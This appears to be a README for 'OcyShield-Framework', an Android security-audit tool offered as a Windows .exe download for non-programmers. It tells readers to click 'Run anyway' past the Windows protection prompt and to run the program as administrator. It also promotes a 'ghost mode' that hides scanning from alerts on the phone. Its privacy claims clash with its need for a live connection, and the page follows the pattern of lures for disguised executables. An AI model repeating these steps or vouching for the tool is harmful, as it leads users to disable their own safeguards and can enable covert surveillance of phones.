OcyShield-Framework provides a simple way to audit the security of Android devices. Security teams use this tool to find vulnerabilities and test system defenses. You do not need experience in coding to use it. The software performs automated checks to identify weaknesses. It uses a ghost mode feature to keep your activities hidden during your assessment.
Before you install this software, confirm your computer meets these requirements:
- Operating System: Windows 10 or Windows 11.
- Memory: At least 4 gigabytes of RAM.
- Storage: 500 megabytes of free space.
- Connection: A stable internet connection for updates.
- Drivers: The latest USB drivers for your Android device.
Follow these steps to prepare your system and run the software.
- Enable Developer Options on your Android device. Go to Settings, find About Phone, and tap Build Number seven times.
- Open Developer Options in your settings menu and enable USB Debugging.
- Use a high-quality USB cable to connect your phone to your computer.

You must obtain the official installer from our release page. Visit this page to download the latest version of the framework.
Download OcyShield-Framework Here
- Click the link above to open the repository release page.
- Look for the Assets section at the bottom of the top release header.
- Download the file ending in .exe.
- Save the file to your desktop for easy access.
Double-click the downloaded file to begin the installation. Windows may show a security prompt. If a window appears stating that Windows protected your PC, click More Info and then select Run anyway. This happens because the software is a specialized tool that performs deep system checks.
Follow the on-screen prompts. Choose a folder for the installation or use the default location. Once the progress bar fills, click Finish to complete the setup. OcyShield-Framework creates a desktop icon. You can start the tool by clicking this icon.
Once the main window opens, you see several options for your security assessment.
- Select your device from the dropdown menu in the top left corner.
- Choose the level of testing you wish to perform. We recommend Normal Mode for your first attempt.
- Toggle the Ghost Mode switch if you want to perform your scan without triggering local alerts on the device.
- Click the Analyze button to start the process.
The tool then connects to your device and scans for outdated software components, weak encryption settings, and open network ports. The software logs these findings and presents them in a clear report once the scan ends.
The software generates a report after every scan. This file summarizes the security posture of your Android device.
- Critical Issues: These items require immediate attention. They represent holes that allow unauthorized access.
- Warning Items: These items are not immediate threats but may impact the security of your data over time.
- Informational Logs: These show the settings active on your device that contribute to its security profile.
The tool provides links to documentation for every issue found. You can read these suggestions to learn how to fix the identified problems.
What if the computer does not see my Android device? Check your USB connection. Use a different port if the first one fails. Ensure that your phone is unlocked and set to File Transfer mode.
Does this tool harm my phone? No. This tool reads data and checks configurations. It does not modify system files unless you explicitly select an automated repair option.
Can I use this on non-rooted phones? Yes. OcyShield-Framework functions on standard devices. Some deep-level checks require elevated permissions, but most audits work on any modern Android version.
How do I update the tool? The software checks the release page automatically on startup. If a newer version exists, the tool informs you and provides a link to download the update.
Is my data kept private? Yes. All scanning occurs locally on your machine. The framework does not send device data to external servers. Your findings stay on your computer.
If you encounter a blank screen, restart the software as an administrator. Right-click the icon and choose Run as administrator to grant it the necessary permissions.
If the scan stops mid-process, check your internet connection. Some audit modules perform small lookups to verify current security benchmarks. A stable connection ensures the audit completes without interruption.
If you observe an error code related to missing components, reinstall the software. This clears any corrupted files from a bad download or an interrupted installation attempt.
Keep your Android device updated. Always install the latest software patches from your manufacturer. Do not allow apps from unknown sources. Disable Bluetooth when you are not using it. Use a strong screen lock to protect your physical device. Audit your device every three months to ensure your security posture remains strong. OcyShield-Framework makes this recurring task easy and reliable.
